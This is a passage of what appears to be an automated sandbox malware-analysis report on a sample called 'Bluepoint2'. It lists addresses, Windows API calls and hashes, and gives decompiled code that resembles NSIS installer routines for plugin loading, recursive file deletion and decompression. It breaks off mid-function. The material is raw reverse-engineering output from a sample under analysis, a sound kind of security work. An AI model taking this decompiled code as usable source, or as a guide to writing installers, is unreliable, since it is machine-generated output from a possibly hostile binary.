                                                                                                                                    0x713c2065
                                                                                                                                    0x713c1ff2
                                                                                                                                    0x713c1ff4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f60
                                                                                                                                    0x713c1e05
                                                                                                                                    0x713c1e05
                                                                                                                                    0x713c1e06
                                                                                                                                    0x713c1f46
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f46
                                                                                                                                    0x713c1e0c
                                                                                                                                    0x713c1e0d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1e13
                                                                                                                                    0x713c1e16
                                                                                                                                    0x713c1f0b
                                                                                                                                    0x713c1f0b
                                                                                                                                    0x713c1f0e
                                                                                                                                    0x713c1f23
                                                                                                                                    0x713c1f25
                                                                                                                                    0x713c1f25
                                                                                                                                    0x713c1f26
                                                                                                                                    0x713c1f29
                                                                                                                                    0x713c1f2c
                                                                                                                                    0x713c1f38
                                                                                                                                    0x713c1f38
                                                                                                                                    0x713c1f38
                                                                                                                                    0x713c1f2e
                                                                                                                                    0x713c1f2e
                                                                                                                                    0x713c1f2e
                                                                                                                                    0x713c1f3e
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f3e
                                                                                                                                    0x713c1f10
                                                                                                                                    0x713c1f10
                                                                                                                                    0x713c1f11
                                                                                                                                    0x713c1f1f
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f1f
                                                                                                                                    0x713c1f14
                                                                                                                                    0x713c1f15
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f1b
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f1b
                                                                                                                                    0x713c1e1c
                                                                                                                                    0x713c1f07
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f07
                                                                                                                                    0x713c1e22
                                                                                                                                    0x713c1e22
                                                                                                                                    0x713c1e25
                                                                                                                                    0x713c1e4e
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1e4e
                                                                                                                                    0x713c1e27
                                                                                                                                    0x713c1e27
                                                                                                                                    0x713c1e2a
                                                                                                                                    0x713c1e44
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1e44
                                                                                                                                    0x713c1e2c
                                                                                                                                    0x713c1e2c
                                                                                                                                    0x713c1e2f
                                                                                                                                    0x713c1e3e
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1e3e
                                                                                                                                    0x713c1e32
                                                                                                                                    0x713c1e33
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1e35
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1cec
                                                                                                                                    0x713c1cec
                                                                                                                                    0x713c1cef
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1cef
                                                                                                                                    0x713c1ce6
                                                                                                                                    0x713c1cd3
                                                                                                                                    0x713c1cd8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1cda
                                                                                                                                    0x713c1cdd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1cdd
                                                                                                                                    0x713c1c6d
                                                                                                                                    0x713c1c70
                                                                                                                                    0x713c1ca6
                                                                                                                                    0x713c1ca9
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1caf
                                                                                                                                    0x713c1cb1
                                                                                                                                    0x713c1cb5
                                                                                                                                    0x713c1cbc
                                                                                                                                    0x713c1cc3
                                                                                                                                    0x713c1cc6
                                                                                                                                    0x713c1cc9
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1cc9
                                                                                                                                    0x713c1ca9
                                                                                                                                    0x713c1c72
                                                                                                                                    0x713c1c73
                                                                                                                                    0x713c1c8e
                                                                                                                                    0x713c1c91
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1c97
                                                                                                                                    0x713c1c97
                                                                                                                                    0x713c1c9e
                                                                                                                                    0x713c1ca1
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1ca1
                                                                                                                                    0x713c1c91
                                                                                                                                    0x713c1c78
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1c7e
                                                                                                                                    0x713c1c7e
                                                                                                                                    0x713c1c85
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1c85
                                                                                                                                    0x713c1c78
                                                                                                                                    0x713c1e74
                                                                                                                                    0x713c1e79
                                                                                                                                    0x713c1e7e
                                                                                                                                    0x713c1e82
                                                                                                                                    0x713c2355
                                                                                                                                    0x713c235b
                                                                                                                                    0x713c1e94
                                                                                                                                    0x713c1e96
                                                                                                                                    0x713c1e97
                                                                                                                                    0x713c227e
                                                                                                                                    0x713c227e
                                                                                                                                    0x713c2281
                                                                                                                                    0x713c2284
                                                                                                                                    0x713c22a1
                                                                                                                                    0x713c22a7
                                                                                                                                    0x713c22a9
                                                                                                                                    0x713c22af
                                                                                                                                    0x713c22c6
                                                                                                                                    0x713c22c6
                                                                                                                                    0x713c22c6
                                                                                                                                    0x713c22d3
                                                                                                                                    0x713c22d9
                                                                                                                                    0x713c22dc
                                                                                                                                    0x713c22e2
                                                                                                                                    0x713c22e4
                                                                                                                                    0x713c22e8
                                                                                                                                    0x713c22ea
                                                                                                                                    0x713c22f1
                                                                                                                                    0x713c22f6
                                                                                                                                    0x713c22f9
                                                                                                                                    0x713c22fb
                                                                                                                                    0x713c2300
                                                                                                                                    0x713c2312
                                                                                                                                    0x713c2312
                                                                                                                                    0x713c2300
                                                                                                                                    0x713c22f9
                                                                                                                                    0x713c22e8
                                                                                                                                    0x713c2318
                                                                                                                                    0x713c231b
                                                                                                                                    0x713c2325
                                                                                                                                    0x713c232d
                                                                                                                                    0x713c233a
                                                                                                                                    0x713c2340
                                                                                                                                    0x713c2343
                                                                                                                                    0x713c2273
                                                                                                                                    0x713c2273
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2273
                                                                                                                                    0x713c2349
                                                                                                                                    0x713c234f
                                                                                                                                    0x713c234f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2351
                                                                                                                                    0x713c2351
                                                                                                                                    0x713c2351
                                                                                                                                    0x713c2351
                                                                                                                                    0x00000000
                                                                                                                                    0x713c231d
                                                                                                                                    0x713c231d
                                                                                                                                    0x713c2323
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2323
                                                                                                                                    0x713c231b
                                                                                                                                    0x713c22b2
                                                                                                                                    0x713c22b8
                                                                                                                                    0x713c22ba
                                                                                                                                    0x713c22c0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c22c0
                                                                                                                                    0x713c2286
                                                                                                                                    0x713c228d
                                                                                                                                    0x713c2293
                                                                                                                                    0x713c2299
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2299
                                                                                                                                    0x713c1e9d
                                                                                                                                    0x713c1e9e
                                                                                                                                    0x713c225d
                                                                                                                                    0x713c225d
                                                                                                                                    0x713c2263
                                                                                                                                    0x713c2266
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c226d
                                                                                                                                    0x713c2272
                                                                                                                                    0x00000000
                                                                                                                                    0x713c2272
                                                                                                                                    0x713c1ea5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1eab
                                                                                                                                    0x713c1eab
                                                                                                                                    0x713c1eb4
                                                                                                                                    0x713c1eb9
                                                                                                                                    0x713c1ebf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1ec5
                                                                                                                                    0x713c1ed2
                                                                                                                                    0x713c1ed8
                                                                                                                                    0x713c1ee2
                                                                                                                                    0x713c1ee8
                                                                                                                                    0x713c1ef0
                                                                                                                                    0x713c1f00
                                                                                                                                    0x00000000
                                                                                                                                    0x713c1f00

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 713C12BB: GlobalAlloc.KERNELBASE(00000040,?,713C12DB,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12C5
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 713C1D2D
                                                                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 713C1D75
                                                                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 713C1D7F
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C1D92
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 713C1E74
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 713C1E79
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 713C1E7E
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 713C2068
                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 713C2222
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 713C22A1
                                                                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 713C22B2
                                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 713C230C
                                                                                                                                    • lstrlenW.KERNEL32(00000808), ref: 713C2326
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84129670690.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84129620684.00000000713C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129732994.00000000713C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84129781776.00000000713C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_713c0000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 245916457-0
                                                                                                                                    • Opcode ID: 5a14d3550815f832db113a28f9b1c4a2c0c460955dea0377756dc883eb06d4b8
                                                                                                                                    • Instruction ID: 090ec0b801579ac9f6f9f2ad213c861905471b5d8d27991e53b56fc10688fc97
                                                                                                                                    • Opcode Fuzzy Hash: 5a14d3550815f832db113a28f9b1c4a2c0c460955dea0377756dc883eb06d4b8
                                                                                                                                    • Instruction Fuzzy Hash: 15229C71D0420ADEDB12DFA8C984AEEBBB9FB04B19F10452ED166E22C4D770DD85EB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 740 405d74-405d9a call 40603f 743 405db3-405dba 740->743 744 405d9c-405dae DeleteFileW 740->744 746 405dbc-405dbe 743->746 747 405dcd-405ddd call 406668 743->747 745 405f30-405f34 744->745 748 405dc4-405dc7 746->748 749 405ede-405ee3 746->749 755 405dec-405ded call 405f83 747->755 756 405ddf-405dea lstrcatW 747->756 748->747 748->749 749->745 751 405ee5-405ee8 749->751 753 405ef2-405efa call 40699e 751->753 754 405eea-405ef0 751->754 753->745 764 405efc-405f10 call 405f37 call 405d2c 753->764 754->745 758 405df2-405df6 755->758 756->758 760 405e02-405e08 lstrcatW 758->760 761 405df8-405e00 758->761 763 405e0d-405e29 lstrlenW FindFirstFileW 760->763 761->760 761->763 765 405ed3-405ed7 763->765 766 405e2f-405e37 763->766 780 405f12-405f15 764->780 781 405f28-405f2b call 4056ca 764->781 765->749 771 405ed9 765->771 768 405e57-405e6b call 406668 766->768 769 405e39-405e41 766->769 782 405e82-405e8d call 405d2c 768->782 783 405e6d-405e75 768->783 772 405e43-405e4b 769->772 773 405eb6-405ec6 FindNextFileW 769->773 771->749 772->768 776 405e4d-405e55 772->776 773->766 779 405ecc-405ecd FindClose 773->779 776->768 776->773 779->765 780->754 786 405f17-405f26 call 4056ca call 406428 780->786 781->745 791 405eae-405eb1 call 4056ca 782->791 792 405e8f-405e92 782->792 783->773 787 405e77-405e80 call 405d74 783->787 786->745 787->773 791->773 795 405e94-405ea4 call 4056ca call 406428 792->795 796 405ea6-405eac 792->796 795->773 796->773
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                                                                                    0x00405d7e
                                                                                                                                    0x00405d83
                                                                                                                                    0x00405d8c
                                                                                                                                    0x00405d8f
                                                                                                                                    0x00405d97
                                                                                                                                    0x00405d9a
                                                                                                                                    0x00405d9d
                                                                                                                                    0x00405da5
                                                                                                                                    0x00405da7
                                                                                                                                    0x00405da8
                                                                                                                                    0x00000000
                                                                                                                                    0x00405da8
                                                                                                                                    0x00405db3
                                                                                                                                    0x00405db6
                                                                                                                                    0x00405db6
                                                                                                                                    0x00405db6
                                                                                                                                    0x00405dba
                                                                                                                                    0x00405dcd
                                                                                                                                    0x00405dd4
                                                                                                                                    0x00405dd9
                                                                                                                                    0x00405ddd
                                                                                                                                    0x00405ded
                                                                                                                                    0x00405ddf
                                                                                                                                    0x00405de5
                                                                                                                                    0x00405de5
                                                                                                                                    0x00405df2
                                                                                                                                    0x00405df6
                                                                                                                                    0x00405e02
                                                                                                                                    0x00405e08
                                                                                                                                    0x00405e0d
                                                                                                                                    0x00405e13
                                                                                                                                    0x00405e1e
                                                                                                                                    0x00405e24
                                                                                                                                    0x00405e26
                                                                                                                                    0x00405e29
                                                                                                                                    0x00405ed3
                                                                                                                                    0x00405ed3
                                                                                                                                    0x00405ed7
                                                                                                                                    0x00405ed9
                                                                                                                                    0x00405ed9
                                                                                                                                    0x00405ed9
                                                                                                                                    0x00405ed9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405e2f
                                                                                                                                    0x00405e2f
                                                                                                                                    0x00405e2f
                                                                                                                                    0x00405e37
                                                                                                                                    0x00405e57
                                                                                                                                    0x00405e5f
                                                                                                                                    0x00405e64
                                                                                                                                    0x00405e6b
                                                                                                                                    0x00405e86
                                                                                                                                    0x00405e8b
                                                                                                                                    0x00405e8d
                                                                                                                                    0x00405eb1
                                                                                                                                    0x00405e8f
                                                                                                                                    0x00405e8f
                                                                                                                                    0x00405e92
                                                                                                                                    0x00405ea6
                                                                                                                                    0x00405e94
                                                                                                                                    0x00405e97
                                                                                                                                    0x00405e9f
                                                                                                                                    0x00405e9f
                                                                                                                                    0x00405e92
                                                                                                                                    0x00405e6d
                                                                                                                                    0x00405e73
                                                                                                                                    0x00405e75
                                                                                                                                    0x00405e7b
                                                                                                                                    0x00405e7b
                                                                                                                                    0x00405e75
                                                                                                                                    0x00000000
                                                                                                                                    0x00405e6b
                                                                                                                                    0x00405e39
                                                                                                                                    0x00405e41
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405e43
                                                                                                                                    0x00405e4b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405e4d
                                                                                                                                    0x00405e55
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405eb6
                                                                                                                                    0x00405ebe
                                                                                                                                    0x00405ec4
                                                                                                                                    0x00405ec4
                                                                                                                                    0x00405ecd
                                                                                                                                    0x00000000
                                                                                                                                    0x00405ecd
                                                                                                                                    0x00405df8
                                                                                                                                    0x00405e00
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405dbc
                                                                                                                                    0x00405dbc
                                                                                                                                    0x00405dbe
                                                                                                                                    0x00405ede
                                                                                                                                    0x00405ee0
                                                                                                                                    0x00405ee3
                                                                                                                                    0x00405f34
                                                                                                                                    0x00405f34
                                                                                                                                    0x00405f34
                                                                                                                                    0x00405ee5
                                                                                                                                    0x00405ee8
                                                                                                                                    0x00405ef3
                                                                                                                                    0x00405ef8
                                                                                                                                    0x00405efa
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405efd
                                                                                                                                    0x00405f09
                                                                                                                                    0x00405f0e
                                                                                                                                    0x00405f10
                                                                                                                                    0x00000000
                                                                                                                                    0x00405f2b
                                                                                                                                    0x00405f12
                                                                                                                                    0x00405f15
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405f1a
                                                                                                                                    0x00000000
                                                                                                                                    0x00405f21
                                                                                                                                    0x00405eea
                                                                                                                                    0x00405eea
                                                                                                                                    0x00000000
                                                                                                                                    0x00405eea
                                                                                                                                    0x00405dc4
                                                                                                                                    0x00405dc7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405dc7

                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,77133420,77132EE0,00000000), ref: 00405D9D
                                                                                                                                    • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405DE5
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,77133420,77132EE0,00000000), ref: 00405E0E
                                                                                                                                    • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,77133420,77132EE0,00000000), ref: 00405E1E
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.84104538123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.84104491889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104632043.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104686670.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104898038.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84104954758.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105014701.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: .$.$PWB$\*.*
                                                                                                                                    • API String ID: 2035342205-2468439962
                                                                                                                                    • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                                                                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                                                                    • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                                                                                                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1023 406d5f-406d64 1024 406dd5-406df3 1023->1024 1025 406d66-406d95 1023->1025 1028 4073cb-4073e0 1024->1028 1026 406d97-406d9a 1025->1026 1027 406d9c-406da0 1025->1027 1029 406dac-406daf 1026->1029 1030 406da2-406da6 1027->1030 1031 406da8 1027->1031 1032 4073e2-4073f8 1028->1032 1033 4073fa-407410 1028->1033 1035 406db1-406dba 1029->1035 1036 406dcd-406dd0 1029->1036 1030->1029 1031->1029 1034 407413-40741a 1032->1034 1033->1034 1037 407441-40744d 1034->1037 1038 40741c-407420 1034->1038 1039 406dbc 1035->1039 1040 406dbf-406dcb 1035->1040 1041 406fa2-406fc0 1036->1041 1051 406be3-406bec 1037->1051 1042 407426-40743e 1038->1042 1043 4075cf-4075d9 1038->1043 1039->1040 1047 406e35-406e63 1040->1047 1045 406fc2-406fd6 1041->1045 1046 406fd8-406fea 1041->1046 1042->1037 1050 4075e5-4075f8 1043->1050 1052 406fed-406ff7 1045->1052 1046->1052 1048 406e65-406e7d 1047->1048 1049 406e7f-406e99 1047->1049 1055 406e9c-406ea6 1048->1055 1049->1055 1058 4075fd-407601 1050->1058 1053 406bf2 1051->1053 1054 4075fa 1051->1054 1056 406ff9 1052->1056 1057 406f9a-406fa0 1052->1057 1059 406bf9-406bfd 1053->1059 1060 406d39-406d5a 1053->1060 1061 406c9e-406ca2 1053->1061 1062 406d0e-406d12 1053->1062 1054->1058 1064 406eac 1055->1064 1065 406e1d-406e23 1055->1065 1066 406f75-406f79 1056->1066 1067 40710a-407117 1056->1067 1057->1041 1063 406f3e-406f48 1057->1063 1059->1050 1076 406c03-406c10 1059->1076 1060->1028 1068 406ca8-406cc1 1061->1068 1069 40754e-407558 1061->1069 1077 406d18-406d2c 1062->1077 1078 40755d-407567 1062->1078 1070 40758d-407597 1063->1070 1071 406f4e-406f70 1063->1071 1080 406e02-406e1a 1064->1080 1081 407569-407573 1064->1081 1072 406ed6-406edc 1065->1072 1073 406e29-406e2f 1065->1073 1074 407581-40758b 1066->1074 1075 406f7f-406f97 1066->1075 1067->1051 1082 406cc4-406cc8 1068->1082 1069->1050 1070->1050 1071->1067 1083 406f3a 1072->1083 1086 406ede-406efc 1072->1086 1073->1047 1073->1083 1074->1050 1075->1057 1076->1054 1084 406c16-406c5c 1076->1084 1085 406d2f-406d37 1077->1085 1078->1050 1080->1065 1081->1050 1082->1061 1087 406cca-406cd0 1082->1087 1083->1063 1088 406c84-406c86 1084->1088 1089 406c5e-406c62 1084->1089 1085->1060 1085->1062 1090 406f14-406f26 1086->1090 1091 406efe-406f12 1086->1091 1092 406cd2-406cd9 1087->1092 1093 406cfa-406d0c 1087->1093 1096 406c94-406c9c 1088->1096 1097 406c88-406c92 1088->1097 1094 406c64-406c67 GlobalFree 1089->1094 1095 406c6d-406c7b GlobalAlloc 1089->1095 1098 406f29-406f33 1090->1098 1091->1098 1099 406ce4-406cf4 GlobalAlloc 1092->1099 1100 406cdb-406cde GlobalFree 1092->1100 1093->1085 1094->1095 1095->1054 1101 406c81 1095->1101 1096->1082 1097->1096 1097->1097 1098->1072 1102 406f35 1098->1102 1099->1054 1099->1093 1100->1099 1101->1088 1104 407575-40757f 1102->1104 1105 406ebb-406ed3 1102->1105 1104->1050 1105->1072
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
